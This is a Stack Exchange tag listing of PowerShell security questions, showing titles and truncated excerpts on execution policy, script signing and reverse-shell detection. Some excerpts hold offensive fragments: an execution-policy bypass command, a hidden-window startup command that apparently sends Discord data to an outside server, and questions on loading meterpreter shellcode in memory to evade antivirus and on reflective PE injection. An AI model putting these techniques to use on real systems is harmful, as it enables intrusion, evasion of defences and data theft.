IT Security Stack Exchange
IT Security Stack Exchange

Questions tagged [powershell]

task automation and configuration management CLI for Windows, the first release was in Windows XP SP2 in 2006

PowerShell is a CLI on Windows like CMD but it has enhanced functionality, since it was build up to create management scripts and automate system tasks.

94 questions
33
votes
2 answers

How is PowerShell's RemoteSigned execution policy different from AllSigned?

I'm still pretty new to PowerShell, and recently read this in a blog posting about creating and using PowerShell scripts. To prevent the execution of malicious scripts, PowerShell enforces an execution policy. By default, the execution policy is…
Iszi
  • 27,127
  • 18
  • 101
  • 163
13
votes
1 answer

What's the purpose of "ExecutionPolicy" settings in PowerShell if the "-bypass" switch circumvents it?

PowerShell's "ExecutionPolicy" allows for restricting all scripts from running, only allowing signed scripts, etc - see this article for reference. However, if I simply do: PowerShell -ExecutionPolicy Bypass -file MyScript.ps1 ... I have…
gravity
  • 229
  • 2
  • 7
4
votes
1 answer

Is there a way to run a downloaded powershell script as admin without setting a global ExecutionPolicy bypass?

Since the 20H2 build of Windows 10 came out, if I want to run a script without copying and pasting it into a PowerShell window, I have to write the following command: Set-ExecutionPolicy -ExecutionPolicy ByPass -Scope Process -Force I don't want to…
leeand00
  • 1,431
  • 1
  • 14
  • 22
3
votes
2 answers

How do you find out if your PC is reverse shelled?

I am just wondering, how do you find out is your PC is reverse shelled or not? Does your antivirus protect against it?
Marinaro
  • 31
  • 2
2
votes
2 answers

Admins running Powershell from their desktop instead of server

What security issues are presented by letting server admins in a corporate environment run PowerShell scripts from their local desktop rather than from the server? I am not a server guru by any means so I am curious what potential security issues…
mischievouspasta
  • 29
  • 1
1
vote
1 answer

What is this PowerShell script sending Discord info to random server?

Upon turning on my personal Windows 10 computer tonight, I was greeted with ConEmu telling me that two PowerShell commands were run at startup. Both commands were the same thing: powershell -windowstyle hidden -Command "& {&invoke-webrequest -method…
Mike Boch
  • 11
  • 2
1
vote
1 answer

Store a text in encrypted form and use in powershell script without compromising it to other users?

I want to encrypt a text which I want to use in different PowerShell script without compromising its security as other user will be using scripts that will contain that text. Basically I want to conceal that text from everybody and use it without…
Ankit
  • 11
  • 1
1
vote
1 answer

Is it always safe to type [i.e. run Get-Content] on a file in PowerShell?

Supposedly an attacker sends me a malicious readme.txt and I'm going to open PowerShell and run type readme.txt. Can the attacker via any sort of control char sequences or using any other technique cause a non-expected behavior this way?
bohdan_trotsenko
  • 123
  • 5
0
votes
0 answers

Invoke GetProcAddress returns nothing

I try to execute a meterpreter shellcode to a windows machine. In order to bypass the AV, I try to load the shellcode in the memory thanks to the DelegateType Reflection technique. Below, the first lines of the powershell commands: $systemdll =…
salt
  • 259
  • 2
  • 11
0
votes
1 answer

How can I modify Windows registry programmatically?

Which programming language I can use to modify Windows registry? Can I use js or powershell?
Fatih Durmuş
  • 9
  • 1
  • 5
0
votes
1 answer

Why Invoke-ReflectivePEInjection not recognized

I was trying Invoke-ReflectivePEInjection by doing .\Convert-BinaryToString Convert-BinaryToString C:\file.exe $InputString="base64string" $PEBytes=[System.Convert]::FromBase64String($InputString) But when I run Invoke-ReflectivePEInjection…
ampf27
  • 3
  • 1
  • 3
0
votes
1 answer

How do I prevent someone from using my certificate to sign a malicious script on my PC?

The first step to make Powershell more secure is to create a certificate to sign my scripts. Then you actually sign it with this command: Set-AuthenticodeSignature -FilePath myScript.ps1 -Certificate (Get-ChildItem -Path Cert:\CurrentUser\My\…
BadSnowflake
  • 103
  • 2